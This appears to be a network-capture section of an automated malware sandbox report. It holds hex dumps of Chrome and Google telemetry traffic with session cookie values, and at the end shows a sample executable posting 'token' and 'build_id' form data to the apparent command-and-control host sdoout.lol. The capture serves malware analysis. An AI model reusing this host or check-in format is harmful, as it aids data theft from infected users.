                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28
                                                                                                                                                                                                                                                                                          Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69
                                                                                                                                                                                                                                                                                          Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79
                                                                                                                                                                                                                                                                                          Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c
                                                                                                                                                                                                                                                                                          Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45
                                                                                                                                                                                                                                                                                          Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74
                                                                                                                                                                                                                                                                                          Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length||delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ction(){if(!a||typeof a!="function"||!a.prototype.entries||typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)||d.size!=1||d.add(c)!=d||d.size!=1||d.add({x:4})!=d||d.size!=2)return!1;var e=d.entries(),f=e.n
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:20 UTC1390INData Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 69 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7c 7c 5f 2e 6c 61 7d 29 3b 6d 61 28 22 53
                                                                                                                                                                                                                                                                                          Data Ascii: ray.prototype.entries",function(a){return a?a:function(){return Fa(this,function(b,c){return[b,c]})}});ma("Array.prototype.keys",function(a){return a?a:function(){return Fa(this,function(b){return b})}});ma("globalThis",function(a){return a||_.la});ma("S


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          12192.168.2.949731142.250.186.1104437916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:21 UTC722OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 913
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                          X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:21 UTC913OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 35 37 30 35 31 38 38 30 36 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],373,[["1735570518806",null,null,null,
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:21 UTC942INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                          Set-Cookie: NID=520=VFB7_O5e-bphtPaiU_j6t-KXhqgEMQzS4OqXtY27Yp4oSqT63GQeoX-cFvCuB2_AeNJS0LFTk0XE1bD90o0bNu2O0yDFxB7d_aZTkBGd5MzwxOyiWTB2LVn8Yuev4JLOTNNTOVBnJsZqgzil68uum6U8g9_A_WKwLrDyZpygkRmGYQ508RKlAaNo; expires=Tue, 01-Jul-2025 14:55:21 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:21 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Expires: Mon, 30 Dec 2024 14:55:21 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:21 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          13192.168.2.949738142.250.186.1104437916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC924OUTPOST /log?format=json&hasfast=true HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 918
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                          X-Client-Data: CIu2yQEIo7bJAQipncoBCNT9ygEIkqHLAQiFoM0BCLnKzQEIidPNAQip1c0BGOmYzQEY642lFw==
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          Cookie: NID=520=VFB7_O5e-bphtPaiU_j6t-KXhqgEMQzS4OqXtY27Yp4oSqT63GQeoX-cFvCuB2_AeNJS0LFTk0XE1bD90o0bNu2O0yDFxB7d_aZTkBGd5MzwxOyiWTB2LVn8Yuev4JLOTNNTOVBnJsZqgzil68uum6U8g9_A_WKwLrDyZpygkRmGYQ508RKlAaNo
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC918OUTData Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 34 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 35 35 37 30 35 32 30 36 38 34 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c
                                                                                                                                                                                                                                                                                          Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.134"],[1,0,0,0,0]]],373,[["1735570520684",null,null,null,
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC950INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: chrome-untrusted://new-tab-page
                                                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                          Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                                                                          Set-Cookie: NID=520=jcaDxURk7_o_zZUg8LdUs7ROyUkwcY6cF_CulVXWi17q932iZ0mP0ZvYVz8zgm9n3l5TovKcl4iZBuL2ln85jW71ODKc8bnlJtQELDZxeBmL8BWY221_s5nYhDV10Je0OZKkRhJvRpoJxWuzGar3WRRSePTjwxCyC60pxyK2l2fxN2oGDgmjnXyljCnVSYXP; expires=Tue, 01-Jul-2025 14:55:23 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:23 GMT
                                                                                                                                                                                                                                                                                          Server: Playlog
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          Expires: Mon, 30 Dec 2024 14:55:23 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC137INData Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          14192.168.2.949741116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ymozcb1d2nop8qiekfkf
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                          Host: sdoout.lol
                                                                                                                                                                                                                                                                                          Content-Length: 1073
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:23 UTC1073OUTData Raw: 2d 2d 2d 2d 2d 2d 79 6d 6f 7a 63 62 31 64 32 6e 6f 70 38 71 69 65 6b 66 6b 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 66 34 39 31 31 31 32 61 62 62 66 33 35 64 37 64 35 34 64 62 66 32 62 38 39 65 62 31 31 30 38 0d 0a 2d 2d 2d 2d 2d 2d 79 6d 6f 7a 63 62 31 64 32 6e 6f 70 38 71 69 65 6b 66 6b 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 64 30 37 31 33 65 32 36 63 35 30 34 64 35 39 30 37 36 37 39 32 32 31 62 38 63 35 39 65 36 63 0d 0a 2d 2d 2d 2d 2d 2d 79 6d 6f 7a 63 62 31 64 32 6e 6f 70 38 71 69 65 6b 66 6b 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------ymozcb1d2nop8qiekfkfContent-Disposition: form-data; name="token"9f491112abbf35d7d54dbf2b89eb1108------ymozcb1d2nop8qiekfkfContent-Disposition: form-data; name="build_id"cd0713e26c504d5907679221b8c59e6c------ymozcb1d2nop8qiekfkfCont
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Mon, 30 Dec 2024 14:55:24 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          15192.168.2.949745116.203.14.44437428C:\Users\user\Desktop\BHgwhz3lGN.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-30 14:55:24 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8gdtjm7gvaaaie3wbaas
